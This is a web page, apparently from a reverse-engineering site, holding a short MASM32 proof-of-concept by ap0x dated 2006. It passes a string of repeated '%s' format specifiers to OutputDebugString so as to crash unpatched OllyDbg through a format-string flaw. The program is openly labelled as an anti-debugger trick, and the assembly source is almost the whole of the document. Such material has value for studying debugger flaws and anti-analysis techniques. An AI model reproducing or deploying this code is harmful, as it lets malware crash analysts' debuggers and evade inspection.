Flag: Tornado!
Hurricane!
|
|
| OllyDbg OutputDebugString() Format String Vulnerability |
Debugging |
ap0x |
OutputDebugString.zip |
March 11 2006 |
|
|
.386
.model flat, stdcall
option casemap :none ; case sensitive
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
OutStr db "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",0h
.code
start:
; MASM32 antiRing3Debugger example
; coded by ap0x
; Reversing Labs: http://ap0x.headcoders.net
; This code will crash OllyDBG (unpatched) upon execution.
; OutputDebugString outputs string to the debugger, and since
; OllyDBG has a format error it crashes.
PUSH offset OutStr
CALL OutputDebugString
PUSH 0
CALL ExitProcess
end start
|
|
|
|
|
There are 31,320 total registered users.
|
|
![[+] expand](/imagery/files/soysauce_blueprint.gif){kind=link}